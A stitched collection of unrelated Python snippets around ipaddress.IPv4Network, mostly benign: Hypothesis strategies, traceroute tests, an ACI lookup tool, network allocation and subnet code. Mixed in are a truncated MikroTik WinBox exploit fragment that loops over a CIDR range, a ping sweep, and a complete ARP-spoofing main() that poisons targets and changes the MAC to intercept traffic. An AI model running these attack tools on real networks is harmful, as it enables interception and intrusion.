st.builds(range, st.integers(), st.integers()), st.builds(range, st.integers(), st.integers(), st.integers().filter(bool)), ), ipaddress.IPv4Address: ip_addresses(v=4), ipaddress.IPv6Address: ip_addresses(v=6), ipaddress.IPv4Interface: _networks(32).map(ipaddress.IPv4Interface), ipaddress.IPv6Interface: _networks(128).map(ipaddress.IPv6Interface), ipaddress.IPv4Network: st.one_of( _networks(32).map( lambda x: ipaddress.IPv4Network(x, strict=False)), st.sampled_from(SPECIAL_IPv4_RANGES).map(ipaddress.IPv4Network), ), ipaddress.IPv6Network: st.one_of( _networks(128).map( lambda x: ipaddress.IPv6Network(x, strict=False)), st.sampled_from(SPECIAL_IPv6_RANGES).map(ipaddress.IPv6Network), ), os.PathLike: st.builds(PurePath, st.text()), UnicodeDecodeError: st.builds( UnicodeDecodeError, st.just("unknown encoding"), st.just(b""),
0x00, 0x02, 0x00, 0x00, 0x00] cidr = input("Enter network in CIDR: ") try: port = int(input("Enter WinBox port [8291]: ")) except ValueError: print("Using default port 8291") port = 8291 #Default WinBox port. print("Exploit starting...") for ip in ipaddress.IPv4Network(cidr).hosts(): print("***") print(str(ip)) print("***") ip = str(ip) #Initialize Socket s = socket.socket() s.settimeout(3) try:
slice, st.none() | st.integers(), st.none() | st.integers(), st.none() | st.integers(), ), range: st.one_of( st.integers(min_value=0).map(range), st.builds(range, st.integers(), st.integers()), st.builds(range, st.integers(), st.integers(), st.integers().filter(bool)), ), ipaddress.IPv4Address: ip_addresses(v=4), ipaddress.IPv6Address: ip_addresses(v=6), ipaddress.IPv4Interface: _networks(32).map(ipaddress.IPv4Interface), ipaddress.IPv6Interface: _networks(128).map(ipaddress.IPv6Interface), ipaddress.IPv4Network: st.one_of( _networks(32).map(lambda x: ipaddress.IPv4Network(x, strict=False)), st.sampled_from(SPECIAL_IPv4_RANGES).map(ipaddress.IPv4Network), ), ipaddress.IPv6Network: st.one_of( _networks(128).map(lambda x: ipaddress.IPv6Network(x, strict=False)), st.sampled_from(SPECIAL_IPv6_RANGES).map(ipaddress.IPv6Network), ), # Pull requests with more types welcome! } _global_type_lookup[type] = st.sampled_from( [type(None)] + sorted(_global_type_lookup, key=str) ) if sys.version_info[:2] >= (3, 6): # pragma: no branch _global_type_lookup[os.PathLike] = st.builds(PurePath, st.text())
def main():
    """Interactive ACI endpoint lookup tool (Python 2: raw_input/unicode).

    Prompts for APIC credentials, fetches internal and external endpoint
    lists from the configured APICs, then loops reading networks from the
    user and printing every endpoint contained in (or containing) the
    entered network as a PrettyTable.  Type 'refresh' to re-fetch the
    endpoint data and 'quit' to exit.
    """
    BANNER()
    # NOTE(review): DC_LIST holds the APIC addresses and is blank here --
    # presumably meant to be filled in before use; verify.
    DC_LIST = ['', '']
    USER_DETAILS = USERNAME_PASSWORD()
    APIC_USERNAME = USER_DETAILS[0]
    APIC_PASSWORD = USER_DETAILS[1]
    print(colour.BOLD + '\nFilter migration L3Outs?' + colour.END)
    print(
        colour.YELLOW +
        'This will remove all network centric 0.0.0.0/0 External Subnets from search results'
        + colour.END)
    MIGRATION_FILTER = raw_input('\ny/n: ').upper()
    HEADERS = {'content-type': 'application/json'}
    # Build endpoint list.
    time.sleep(1)
    print(colour.BOLD + '\nGetting Endpoint data.\n' + colour.END)
    # Returns a list for internal and external endpoints place [0] is internal and [1] external.
    ENDPOINT_LISTS = GET_ENDPOINTS(DC_LIST, APIC_USERNAME, APIC_PASSWORD,
                                   HEADERS)
    # Build table structure
    TABLE_ENDPOINT = PrettyTable([
        'Location', 'Tenant', 'App Profile/L3Out', 'EPG Name', 'Endpoint',
        'Scope', 'Internal/External'
    ])
    USER_INPUT = ''
    QUIT = 'quit'
    print(
        colour.BOLD +
        'Type "quit" to close application and "refresh" to update Endpoint data'
        + colour.END)
    while USER_INPUT != QUIT:
        USER_INPUT = raw_input(colour.BOLD + 'Enter Network: ' + colour.END)
        # Ignore empty lines and comment-style input starting with '!'.
        if len(USER_INPUT) == 0 or USER_INPUT.startswith('!'):
            pass
        elif USER_INPUT == 'refresh':
            print(colour.BOLD + '\nUpdataing data...' + colour.END)
            ENDPOINT_LISTS = GET_ENDPOINTS(DC_LIST, APIC_USERNAME,
                                           APIC_PASSWORD, HEADERS)
            print(colour.BOLD + '\nEndpoint data updated' + colour.END)
        elif USER_INPUT != QUIT:
            print(
                colour.BOLD +
                '\nScope Key: I = Import Route Control, E = Export Route Control, S = Security\n'
                + colour.END)
            try:
                # Only used to validate the input: raises ValueError on a
                # malformed network, which is caught below.
                network = ipaddress.IPv4Network(unicode(USER_INPUT))
                # External endpoints: match in either containment direction
                # (entered net inside endpoint net, or vice versa).
                for i in ENDPOINT_LISTS[1]:
                    if MIGRATION_FILTER == 'Y' and i['Tenant'].startswith(
                        ('PRD', 'PPE', 'DC1-SBS', 'DC2-SBS', 'DC1-STS',
                         'DC2-STS', 'DC1-REP', 'DC2-REP', 'DC1-OTV',
                         'DC2-OTV')) and i['L3Out'].endswith('L3O'):
                        continue
                    elif IPNetwork(USER_INPUT) in IPNetwork(
                            i['Endpoint']) or IPNetwork(
                                i['Endpoint']) in IPNetwork(USER_INPUT):
                        TABLE_ENDPOINT.add_row([
                            i['Location'], i['Tenant'], i['L3Out'], i['EPG'],
                            i['Endpoint'], i['Scope'], 'EXTERNAL'
                        ])
                # Internal endpoints: single addresses inside the entered net.
                for i in ENDPOINT_LISTS[0]:
                    if IPAddress(i['Endpoint']) in IPNetwork(USER_INPUT):
                        TABLE_ENDPOINT.add_row([
                            i['Location'], i['Tenant'], i['App Profile'],
                            i['EPG'], i['Endpoint'], 'N/A', 'INTERNAL'
                        ])
                print(TABLE_ENDPOINT)
                # Reset the table for the next query.
                TABLE_ENDPOINT = PrettyTable([
                    'Location', 'Tenant', 'App Profile/L3Out', 'EPG Name',
                    'Endpoint', 'Scope', 'Internal/External'
                ])
            except ValueError:
                print(colour.YELLOW + USER_INPUT +
                      ' is not a valid network.' + colour.END)
def test_ixp_networks_updater_integration(ixp_networks):
    """
    Process a traceroute having some hops crossing an IXP network.

    End-to-end check: creates a traceroute from an mtr JSON fixture,
    waits for the consumer threads to parse and enrich it, then verifies
    the emitted SocketIO events, the enriched hop/host data (including
    the IXP-network attribution), the per-enricher in-memory IP info DBs
    and the IP info records persisted to the database.
    """
    raw = open("tests/data/traceroute/mtr_json_2.json").read()
    t1_id = create_traceroute(raw).id
    _wait_for_completion()
    # Compare the SocketIO records emitted by the enricher
    # with those that we expect to see.
    socketio_emitted_records = _get_socketio_emitted_records()
    expected_socketio_emitted_records = _prefix_traceroute_id(
        EXPECTED_SOCKETIO_EMIT_CALLS_TR2, t1_id
    )
    assert socketio_emitted_records == expected_socketio_emitted_records
    # Verify that the last call to SocketIO is the one
    # that notifies about the completion of the
    # enrichment process.
    t = Traceroute.get(Traceroute.id == t1_id)
    socketio_emit_mock.assert_called_with(
        SOCKET_IO_ENRICHMENT_COMPLETED_EVENT,
        {
            "traceroute_id": t1_id,
            "traceroute": t.to_dict(),
            "text": t.to_text()
        },
        namespace=f"/t/{t1_id}"
    )
    # Re-fetch the record to check its post-enrichment state.
    t = Traceroute.get(Traceroute.id == t1_id)
    assert t.parsed is True
    assert t.enriched is True
    assert len(t.hops) == 8
    # Check that the host inside the IXP network is correct.
    hop = t.get_hop_n(7)
    assert len(hop.hosts) == 1
    host = hop.hosts[0]
    assert host.original_host == "217.29.66.1"
    assert str(host.ip) == "217.29.66.1"
    assert host.name == "mix-1.mix-it.net"
    assert host.enriched is True
    # An IXP host has no origin ASNs, only IXP network metadata.
    assert len(host.origins) == 0
    assert host.ixp_network is not None
    assert host.ixp_network.lan_name is None
    assert host.ixp_network.ix_name == "MIX-IT"
    assert host.ixp_network.ix_description == "Milan Internet eXchange"
    # Now, let's verify that all the enrichers from
    # the consumer threads got their IP info DB populated
    # equally. This is to ensure that the IXPNetworksUpdater
    # properly dispatch the IP info entries to all the
    # consumers.
    for thread in CONSUMER_THREADS:
        for enricher in thread.enrichers:
            ip_info_db = enricher.ip_info_db
            assert len(ip_info_db.nodes()) == 4
            assert sorted(ip_info_db.prefixes()) == sorted([
                "89.97.0.0/16",
                "93.62.0.0/15",
                "217.29.66.0/23",
                "217.29.72.0/21"
            ])
            assert ip_info_db.search_exact(
                "217.29.66.0/23"
            ).data["ip_db_info"] == IPDBInfo(
                prefix=ipaddress.ip_network("217.29.66.0/23"),
                origins=None,
                ixp_network=IXPNetwork(
                    lan_name=None,
                    ix_name="MIX-IT",
                    ix_description="Milan Internet eXchange"
                )
            )
    # Check now that the IP Info DB is populated properly.
    db_prefixes = IPInfo_Prefix.select()
    # Build a dict using DB records to make comparisons easier.
    db_prefixes_dict = {
        db_prefix.prefix: db_prefix.origins
        for db_prefix in db_prefixes
    }
    assert len(db_prefixes_dict.keys()) == 4
    assert sorted(db_prefixes_dict.keys()) == sorted([
        ipaddress.IPv4Network("89.97.0.0/16"),
        ipaddress.IPv4Network("93.62.0.0/15"),
        ipaddress.IPv4Network("217.29.66.0/23"),
        ipaddress.IPv4Network("217.29.72.0/21"),
    ])
    db_prefix = IPInfo_Prefix.get(prefix="217.29.66.0/23")
    assert db_prefix.to_ipdbinfo() == IPDBInfo(
        prefix=ipaddress.ip_network("217.29.66.0/23"),
        origins=None,
        ixp_network=IXPNetwork(
            lan_name=None,
            ix_name="MIX-IT",
            ix_description="Milan Internet eXchange"
        )
    )
def test_consumers_basic():
    """
    Create a traceroute and get it parsed and enriched using consumers.

    End-to-end check: creates a traceroute from an mtr JSON fixture,
    waits for the consumer threads to process it, then verifies the
    emitted SocketIO events, the enriched hops/hosts, the per-enricher
    IP info DBs, the persisted IP info records and the collected metrics.
    """
    # Just to be sure that we're actually using the
    # n. of thread we expect, just in case I'll change
    # the way consumer threads are spun up while doing
    # some debugging.
    assert CONSUMER_THREADS_NUM > 1
    assert len(CONSUMER_THREADS) == CONSUMER_THREADS_NUM
    raw = open("tests/data/traceroute/mtr_json_1.json").read()
    t_id = create_traceroute(raw).id
    _wait_for_completion()
    # Compare the SocketIO records emitted by the enricher
    # with those that we expect to see.
    socketio_emitted_records = _get_socketio_emitted_records()
    expected_socketio_emitted_records = _prefix_traceroute_id(
        EXPECTED_SOCKETIO_EMIT_CALLS_TR1, t_id
    )
    assert socketio_emitted_records == expected_socketio_emitted_records
    # Verify that the last call to SocketIO is the one
    # that notifies about the completion of the
    # enrichment process.
    t = Traceroute.select()[0]
    socketio_emit_mock.assert_called_with(
        SOCKET_IO_ENRICHMENT_COMPLETED_EVENT,
        {
            "traceroute_id": t_id,
            "traceroute": t.to_dict(),
            "text": t.to_text()
        },
        namespace=f"/t/{t_id}"
    )
    # Let's check that the traceroute is in the expected
    # state, and that hops and hosts were processed.
    t = Traceroute.select()[0]
    assert t.parsed is True
    assert t.enriched is True
    assert len(t.hops) == 10
    # Hop 1: private address, no RIR/IXP data expected.
    hop = t.get_hop_n(1)
    assert len(hop.hosts) == 1
    host = hop.hosts[0]
    assert host.original_host == "192.168.1.254"
    assert str(host.ip) == "192.168.1.254"
    assert host.name is None
    assert host.enriched is True
    assert len(host.origins) == 0
    assert host.ixp_network is None
    # Hop 6: public address originated by a single ASN.
    hop = t.get_hop_n(6)
    assert len(hop.hosts) == 1
    host = hop.hosts[0]
    assert host.original_host == "62-101-124-17.fastres.net"
    assert str(host.ip) == "62.101.124.17"
    assert host.name == "62-101-124-17.fastres.net"
    assert host.enriched is True
    assert len(host.origins) == 1
    origin = host.origins[0]
    assert origin.asn == 12874
    assert origin.holder == "FASTWEB - Fastweb SpA"
    assert host.ixp_network is None
    # Hop 10: the final destination (Google public DNS).
    hop = t.get_hop_n(10)
    assert len(hop.hosts) == 1
    host = hop.hosts[0]
    assert host.original_host == "dns.google"
    assert str(host.ip) == "8.8.8.8"
    assert host.name == "dns.google"
    assert host.enriched is True
    assert len(host.origins) == 1
    origin = host.origins[0]
    assert origin.asn == 15169
    assert origin.holder == "GOOGLE"
    assert host.ixp_network is None
    # Now, let's verify that all the enrichers from
    # the consumer threads got their IP info DB populated
    # equally. This is to ensure that the IP info records
    # are properly distributed across the consumers.
    for thread in CONSUMER_THREADS:
        for enricher in thread.enrichers:
            ip_info_db = enricher.ip_info_db
            assert len(ip_info_db.nodes()) == 5
            assert sorted(ip_info_db.prefixes()) == sorted([
                "89.97.0.0/16",
                "62.101.124.0/22",
                "209.85.128.0/17",
                "216.239.32.0/19",
                "8.8.8.0/24",
            ])
            assert ip_info_db.search_exact(
                "89.97.0.0/16"
            ).data["ip_db_info"] == IPDBInfo(
                prefix=ipaddress.ip_network("89.97.0.0/16"),
                origins=[
                    (12874, "FASTWEB - Fastweb SpA")
                ],
                ixp_network=None
            )
    # Check now that the IP Info DB is populated properly.
    db_prefixes = IPInfo_Prefix.select()
    # Build a dict using DB records to make comparisons easier.
    db_prefixes_dict = {
        db_prefix.prefix: db_prefix.origins
        for db_prefix in db_prefixes
    }
    assert len(db_prefixes_dict.keys()) == 5
    assert sorted(db_prefixes_dict.keys()) == sorted([
        ipaddress.IPv4Network("89.97.0.0/16"),
        ipaddress.IPv4Network("62.101.124.0/22"),
        ipaddress.IPv4Network("209.85.128.0/17"),
        ipaddress.IPv4Network("216.239.32.0/19"),
        ipaddress.IPv4Network("8.8.8.0/24")
    ])
    db_prefix = IPInfo_Prefix.get(prefix="89.97.0.0/16")
    assert db_prefix.to_ipdbinfo() == IPDBInfo(
        prefix=ipaddress.ip_network("89.97.0.0/16"),
        origins=[
            (12874, "FASTWEB - Fastweb SpA")
        ],
        ixp_network=None
    )
    # Verify that metrics logging is working properly.
    # To see which metrics have been collected:
    #   metrics_mock_wrapper.mm.print_records()
    mm_records = metrics_mock_wrapper.mm.get_records()
    # Expecting 5 calls to the function that performs
    # external queries to fetch IP info.
    # Every time, we want the counter to be increased.
    mm_ip_info_from_external_sources = filter(
        lambda r: (
            r[0] == "incr" and
            r[1] == ("rich_traceroute.enrichers.enricher."
                     "ip_info_from_external_sources") and
            r[2] == 1
        ),
        mm_records
    )
    assert len(list(mm_ip_info_from_external_sources)) == 5
    # Check that we're keeping track of how long those
    # 5 upstream queries take to complete.
    mm_ip_info_from_external_sources = filter(
        lambda r: (
            r[0] == "timing" and
            r[1] == ("rich_traceroute.enrichers.enricher."
                     "ripestat.query_time")
        ),
        mm_records
    )
    assert len(list(mm_ip_info_from_external_sources)) == 5
except subprocess.CalledProcessError: response = None print(' ' + ip + ' is down!') #------------------------------Begin Main------------------------------# # Read commandline switches position = 1 while (arguments >= position): #Destination IP for remote scan if sys.argv[position] == '-dst_ip': argstring = sys.argv[position + 1] #Check if given in CIDR notation if argstring.find('/', 0, len(argstring)) != -1: for ip in ipaddress.IPv4Network(argstring): dst_ip.append(str(ip)) #Remove Network Address del dst_ip[0] #Remove Broadcast Address dst_ip.pop() #Check if given an IP Range elif argstring.find('-', 0, len(argstring)) != -1: dst_ip = (argstring).split('-') beg_ip = int(dst_ip[0]) end_port = int(dst_ip[1]) dst_ip.clear() while (dst_ip <= end_port):
def _get_nic_info(self, cfgFile, intfcDict):
    """Build a dict describing one network interface.

    Combines the parsed interface config file (``intfcDict``) with live
    data from NetworkManager (when available) to resolve the device name,
    IP address, netmask, derived network, MAC address, DHCP flag and
    on-boot state.

    :param cfgFile: path of the interface configuration file (recorded in
        the result under 'cfgfile')
    :param intfcDict: key/value pairs parsed from the config file
        (IPADDR, NETMASK, PREFIX, ...)
    :return: dict of interface attributes, or None when no device name
        can be determined
    """
    device = self._getNetworkInterfaceDeviceName(intfcDict)
    if not device:
        # Unable to determine device name for network interface,
        # configuration may be bogus.
        self.getLogger().warning(
            'Unable to determine device name for [%s]' % (cfgFile))
        return None

    ip = netmask = network = None

    devDict = self._getNetworkManagerDevice(device)
    if not devDict:
        # NetworkManager knows nothing about this device: fall back to the
        # static config file, and to the kernel for the live IP address.
        if 'IPADDR' in intfcDict:
            ip = intfcDict['IPADDR']
        else:
            ip, netmask = self._get_interface_ip_address(device)

        if 'NETMASK' in intfcDict:
            netmask = intfcDict['NETMASK']
        else:
            # Create netmask from PREFIX
            if 'PREFIX' in intfcDict:
                # Convert the prefix (ie /24) to a netmask
                # NOTE(review): with the stdlib `ipaddress` module this
                # raises ValueError when host bits are set in `ip`; the
                # `u()` helper and `.network` below suggest the legacy
                # ipaddr/py2-backport module is in use — confirm which
                # module `ipaddress` actually is before porting.
                netmask = ipaddress.IPv4Network(
                    '%s/%s' % (ip, intfcDict['PREFIX'])).netmask
            else:
                netmask = self._get_netmask_by_network_class(ip)
    else:
        # Use results obtained from NetworkManager
        if 'IP4-SETTINGS.ADDRESS' in devDict:
            ip = devDict['IP4-SETTINGS.ADDRESS']

        if 'IP4-SETTINGS.PREFIX' in devDict:
            # Value looks like "prefix (quoted)"; take the second token and
            # strip its surrounding quote characters.
            vals = devDict['IP4-SETTINGS.PREFIX'].split(' ')
            netmask = vals[1][1:-1]

    if ip and netmask:
        network = str(
            ipaddress.IPv4Network(u('%s/%s' % (ip, netmask))).network)

    mac = self._getNetworkInterfaceMacAddress(device, intfcDict)
    # BUGFIX: devDict may be None/falsy here (fallback branch above); the
    # original evaluated `'GENERAL.HWADDR' in devDict` unconditionally,
    # raising TypeError when NetworkManager returned nothing.
    if not mac and devDict and 'GENERAL.HWADDR' in devDict:
        mac = devDict['GENERAL.HWADDR']

    bootproto = self._getNetworkInterfaceBootproto(intfcDict)
    dhcp = (bootproto.lower() == 'dhcp')

    enabled = self._getNetworkInterfaceOnBoot(intfcDict)

    return {
        'device': device,
        'ip': ip,
        'netmask': netmask,
        'network': network,
        'mac': mac,
        'dhcp': dhcp,
        'boot': True,
        'provision': False,
        'enabled': enabled,
        'cfgfile': cfgFile,
    }
def _network(left, right): 'Helper for match_spec.' return ipaddress.IPv4Address(left) in ipaddress.IPv4Network(right)
def main():
    """Entry point of the ARP-spoofing tool.

    Parses CLI arguments, discovers live targets (nmap or raw ARP scan when a
    CIDR is given), enables IP forwarding, randomizes the interface MAC, then
    spoofs every target in a thread pool until Ctrl+C, at which point the ARP
    tables and the original MAC address are restored.

    NOTE(review): relies on helpers/globals defined elsewhere in the file
    (log, color constants, NmapConnectedDevices, XGetConnectedDevices,
    XSpoofed, XRestored, change_mac, enable_ip_route, getLocalIp, ...).
    """
    parser = argparse.ArgumentParser(description="ARP spoof script")
    parser.print_help = print_help
    parser.add_argument("-t", "--targets",
                        help="Victim IP Address to ARP poison",
                        required=True)
    parser.add_argument(
        "-g", "--gateway",
        help="the host you wish to intercept packets for (usually the gateway)",
        required=True)
    parser.add_argument("-i", "--interface",
                        help="Specify an interface",
                        required=True)
    parser.add_argument("-a", "--arp",
                        help="Scan With ARP instead of nmap scan",
                        action='store_true',
                        required=False)
    args = parser.parse_args()
    targets, gateway, iface, __arp = args.targets, args.gateway, args.interface, args.arp
    # Remember the interface's real MAC so it can be restored on exit.
    global interface_mac
    interface_mac = get_if_hwaddr(iface)
    log.info(f"Started at {t()}")
    if '/' in targets:
        # A whole subnet was given: discover which hosts are actually up.
        if not __arp:
            p = log.progress(
                f"Scanning {CYAN}network{RESET} for {GREEN}connected{RESET} devices"
            )
            up, down, List, targets = NmapConnectedDevices(targets, p)
            _displayWithNmap(up, down, List)
        else:
            targets = ipaddress.IPv4Network(targets)
            targets = [str(target) for target in targets.hosts()]
            p = log.progress(
                f"Scanning {CYAN}network{RESET} for {GREEN}connected{RESET} devices"
            )
            d_v, targets = XGetConnectedDevices(targets, p)
            displayFounded(d_v)
    else:
        # Comma-separated explicit target list.
        targets = targets.split(",")
    # Never poison the gateway or ourselves.
    if gateway in targets:
        targets.remove(gateway)
    if getLocalIp() in targets:
        targets.remove(getLocalIp())
    if len(targets) == 0:
        log.failure(
            f'no {GREEN}clients{RESET} detected in this {WHITE}network.{RESET}'
        )
        log.warn(
            f'if you think this is an {YELLOW}error{RESET}, please specify your {GREEN}targets.{RESET}'
        )
        log.failure('exiting...')
        exit(0)
    p = log.progress("Enabling IP Routing")
    time.sleep(0.5)
    enable_ip_route(p)
    try:
        p = log.progress('Generating mac address')
        change_mac(iface, p)
        v_t = f'{RESET},{GREEN} '.join(targets)
        log.success(
            f"Starting {CYAN}attack{RESET} on {GREEN}{len(targets)}{RESET} valid targets → '{GREEN}{v_t}{RESET}'."
        )
        # Re-poison all targets forever; one worker per target per round.
        while True:
            with concurrent.futures.ThreadPoolExecutor(
                    max_workers=len(targets)) as executor:
                {
                    executor.submit(XSpoofed, str(target), gateway): target
                    for target in targets
                }
    except KeyboardInterrupt:
        # Ctrl+C: undo the poisoning and restore the original MAC.
        log.warning(
            f"{RED}Detected{YELLOW} CTRL+C ! {RESET}restoring the network, please wait...\n"
        )
        with concurrent.futures.ThreadPoolExecutor(
                max_workers=len(targets)) as executor:
            {
                executor.submit(XRestored, str(target), gateway): target
                for target in targets
            }
        p = log.progress(
            f"Restoring {WHITE}{iface} {GREEN}→ {WHITE}{interface_mac}{RESET} mac address"
        )
        change_mac(iface, p, mac=interface_mac)
    except OSError as err:
        change_mac(iface, p, mac=interface_mac)
        exit(log.failure(str(err)))
#!/usr/bin/env python3
"""Print the first/last address, size and netmask of a CIDR given on argv."""
import sys
import ipaddress

if len(sys.argv) < 2:
    print('Provide an IP address in CIDR format eg. 192.0.2.0/26')
    print(
        'See: https://en.wikipedia.org/wiki/Classless_Inter-Domain_Routing for more details'
    )
    # BUGFIX: the original fell through to sys.argv[1] below and crashed
    # with IndexError instead of exiting after printing usage.
    sys.exit(1)

cidr = sys.argv[1]
# strict=False so an address with host bits set (e.g. 192.0.2.5/26) is accepted.
iprange = ([str(ip) for ip in ipaddress.IPv4Network(cidr, strict=False)])
ipn = ipaddress.ip_network(cidr, strict=False)
print("%-20s: %s" % ("Start", iprange[0]))
print("%-20s: %s" % ("End", iprange[-1]))
print("%-20s: %s" % ("Num address", ipn.num_addresses))
print("%-20s: %s" % ("Netmask", ipn.netmask))
def get_next_network(self, prefix_length, num=None, strict=False,
                     as_objects=True):
    """
    Return a list of the next available networks.

    If no networks are available, an empty list will be returned.

    :param prefix_length:
        The prefix length of networks

    :param num:
        The number of networks desired

    :param as_objects:
        Whether to return IPNetwork objects or strings

    :param strict:
        Whether to return networks for strict allocation

    :returns: list(IPNetwork)
    """
    start_time = time.time()  # For debugging

    # If we're reserved, automatically ZILCH!!
    # TODO(jathan): Should we raise an error instead?
    if self.state == Network.RESERVED:
        return []

    # NOTE(review): `err.message` below is Python-2-only; on py3 this would
    # raise AttributeError inside the handler — confirm target runtime.
    try:
        prefix_length = int(prefix_length)
    except (TypeError, ValueError) as err:
        raise exc.ValidationError({'prefix_length': err.message})

    if prefix_length < self.prefix_length:
        raise exc.ValidationError({
            'prefix_length': 'New prefix must be longer than %r' %
            self.prefix_length
        })

    # Default to 1.
    if num is None or num < 1:
        num = 1

    try:
        num = int(num)
    except ValueError as err:
        raise exc.ValidationError({'num': err.message})

    cidr = self.ip_network

    # Requested prefix longer than the family allows: let subnets() raise
    # the descriptive ValueError and re-wrap it as a validation error.
    if prefix_length > cidr.max_prefixlen:
        try:
            next(cidr.subnets(new_prefix=prefix_length))
        except ValueError as err:
            raise exc.ValidationError({'prefix_length': err.message})

    # Existing allocations to avoid: direct children only (strict), or all
    # descendants at least as long as the requested prefix.
    if strict:
        children = [c.ip_network for c in self.get_children()]
    else:
        children = [
            c.ip_network for c in self.get_descendants()
            if (c.prefix_length >= prefix_length)
        ]

    exclude_nums = {}
    network_prefix = cidr.network_address

    # Get integer value of network address of parent network shifted
    # (cidr.max_prefixlen - prefix_length) bits to the right
    a = int(network_prefix) >> (cidr.max_prefixlen - prefix_length)

    for c in children:
        # For each child get integer value of network address shifted
        # (cidr.max_prefixlen - prefix_length) bits to the right
        b = int(c.network_address) >> (cidr.max_prefixlen - prefix_length)
        # Get xor of parent network address and child network address this
        # gets rid of the parent network address bits
        d = a ^ b
        # Store the child's prefix length in excluded_nums with the
        # variable d as the key
        if d in exclude_nums:
            # If two children share the same key, then store the shortest
            # prefix length
            if c.prefixlen < exclude_nums[d]:
                exclude_nums[d] = c.prefixlen
        else:
            exclude_nums[d] = c.prefixlen

    wanted = []

    # Keep a counter starting at integer value of parent network address
    counter = int(cidr.network_address)

    # The upper limit is parent network prefix + 1
    upper = int(
        cidr.network_address) + 2**(cidr.max_prefixlen - cidr.prefixlen)

    while counter < upper:
        # If we have requested number of networks then we can break
        if len(wanted) == num:
            break

        if cidr.version == 4:
            next_subnet = ipaddress.IPv4Network((counter, prefix_length))
        else:
            next_subnet = ipaddress.IPv6Network((counter, prefix_length))

        # Shift the bits between parent prefix and requested prefix all the
        # way to the right
        b = counter >> (cidr.max_prefixlen - prefix_length)

        # Remove the parent network address part
        c = a ^ b

        if c in exclude_nums:
            # If this sequence of bits were seen before then we must skip
            # this network
            p = exclude_nums.pop(c)
            if p < prefix_length:
                # If current network is possibly child of another child
                # then we must skip overlapping child's range of addresses,
                # this is so we can implement strict allocation
                counter += 2**(cidr.max_prefixlen - p)
            else:
                # Otherwise just skip to next network with requested
                # prefix_length
                counter += 2**(cidr.max_prefixlen - prefix_length)
            continue
        else:
            counter += 2**(cidr.max_prefixlen - prefix_length)

        # If this is an interconnect network, we include first and last
        # address in subnet
        if cidr.prefixlen in settings.NETWORK_INTERCONNECT_PREFIXES:
            pass
        elif (
            prefix_length in settings.HOST_PREFIXES and
            (next_subnet.network_address == cidr.network_address or
             next_subnet.broadcast_address == cidr.broadcast_address)):
            # Otherwise we skip first and last address in subnet
            continue

        # Add network to wanted list
        wanted.append(next_subnet)

    elapsed_time = time.time() - start_time
    log.debug('>> WANTED = %s', wanted)
    log.debug('>> ELAPSED TIME: %s' % elapsed_time)
    # NOTE(review): `unicode` is Python-2-only — on py3 this line would
    # raise NameError when as_objects is False.
    return wanted if as_objects else [unicode(w) for w in wanted]
def getMask(IP):
    """Parse *IP* as an IPv4 network, echo it to stdout and return it."""
    network = ipaddress.IPv4Network(IP)
    print(network)
    return network
def ipv4_prefix_str(ipv4_prefix):
    """Render a prefix object (with .address and .prefixlen) as CIDR text."""
    return str(
        ipaddress.IPv4Network((ipv4_prefix.address, ipv4_prefix.prefixlen)))
# NOTE(review): the first entry below is the tail of a conversion (packer)
# table whose opening lines are above this chunk.
    'vl_api_mac_address_t': {
        'MACAddress': lambda o: o.packed,
        'str': lambda s: macaddress.mac_pton(s)
    },
}


def unformat_api_address_t(o):
    # af is the address-family discriminator of the API union:
    # 1 -> IPv6, 0 -> IPv4.
    if o.af == 1:
        return ipaddress.IPv6Address(o.un.ip6)
    if o.af == 0:
        return ipaddress.IPv4Address(o.un.ip4)


def unformat_api_prefix_t(o):
    # Second positional argument False == strict=False: the API may hand us
    # a prefix whose host bits are set.
    if isinstance(o.address, ipaddress.IPv4Address):
        return ipaddress.IPv4Network((o.address, o.address_length), False)
    if isinstance(o.address, ipaddress.IPv6Address):
        return ipaddress.IPv6Network((o.address, o.address_length), False)


# Maps VPP API wire-type names to callables that unpack the raw API value
# into a Python ipaddress/MAC object.
conversion_unpacker_table = {
    'vl_api_ip6_address_t': lambda o: ipaddress.IPv6Address(o),
    'vl_api_ip6_prefix_t': lambda o: ipaddress.IPv6Network((o.prefix, o.len)),
    'vl_api_ip4_address_t': lambda o: ipaddress.IPv4Address(o),
    'vl_api_ip4_prefix_t': lambda o: ipaddress.IPv4Network((o.prefix, o.len)),
    'vl_api_address_t': lambda o: unformat_api_address_t(o),
    'vl_api_prefix_t': lambda o: unformat_api_prefix_t(o),
    'vl_api_mac_address_t': lambda o: macaddress.MACAddress(o),
}
def create_subnet(
    self,
    vpc_id,
    cidr_block,
    ipv6_cidr_block=None,
    availability_zone=None,
    availability_zone_id=None,
    tags=None,
):
    """Create a subnet in the given VPC.

    Validates that the CIDR parses, fits inside one of the VPC's CIDR
    associations and does not overlap an existing subnet, resolves the
    availability zone (name or id, defaulting to us-east-1a), registers
    the subnet, applies tags and associates the default network ACL.

    Raises InvalidCIDRBlockParameterError, InvalidSubnetRangeError,
    GenericInvalidParameterValueError, InvalidSubnetConflictError or
    InvalidAvailabilityZoneError on the corresponding validation failure.
    """
    subnet_id = random_subnet_id()
    vpc = self.get_vpc(
        vpc_id
    )  # Validate VPC exists and the supplied CIDR block is a subnet of the VPC's
    vpc_cidr_blocks = [
        ipaddress.IPv4Network(str(cidr_block_association["cidr_block"]),
                              strict=False)
        for cidr_block_association in vpc.get_cidr_block_association_set()
    ]
    try:
        subnet_cidr_block = ipaddress.IPv4Network(str(cidr_block),
                                                  strict=False)
    except ValueError:
        raise InvalidCIDRBlockParameterError(cidr_block)

    # Containment check: the subnet range must sit inside at least one of
    # the VPC's associated CIDR blocks.
    subnet_in_vpc_cidr_range = False
    for vpc_cidr_block in vpc_cidr_blocks:
        if (vpc_cidr_block.network_address <= subnet_cidr_block.network_address
                and vpc_cidr_block.broadcast_address >=
                subnet_cidr_block.broadcast_address):
            subnet_in_vpc_cidr_range = True
            break

    if not subnet_in_vpc_cidr_range:
        raise InvalidSubnetRangeError(cidr_block)

    # The subnet size must use a /64 prefix length.
    if ipv6_cidr_block and "::/64" not in ipv6_cidr_block:
        raise GenericInvalidParameterValueError("ipv6-cidr-block",
                                                ipv6_cidr_block)

    # Reject any overlap with subnets already present in this VPC.
    for subnet in self.get_all_subnets(filters={"vpc-id": vpc_id}):
        if subnet.cidr.overlaps(subnet_cidr_block):
            raise InvalidSubnetConflictError(cidr_block)

    # if this is the first subnet for an availability zone,
    # consider it the default
    default_for_az = str(availability_zone not in self.subnets).lower()
    map_public_ip_on_launch = default_for_az

    if availability_zone is None and not availability_zone_id:
        availability_zone = "us-east-1a"
    try:
        # Resolve the AZ record either by name or by zone id.
        if availability_zone:
            availability_zone_data = next(
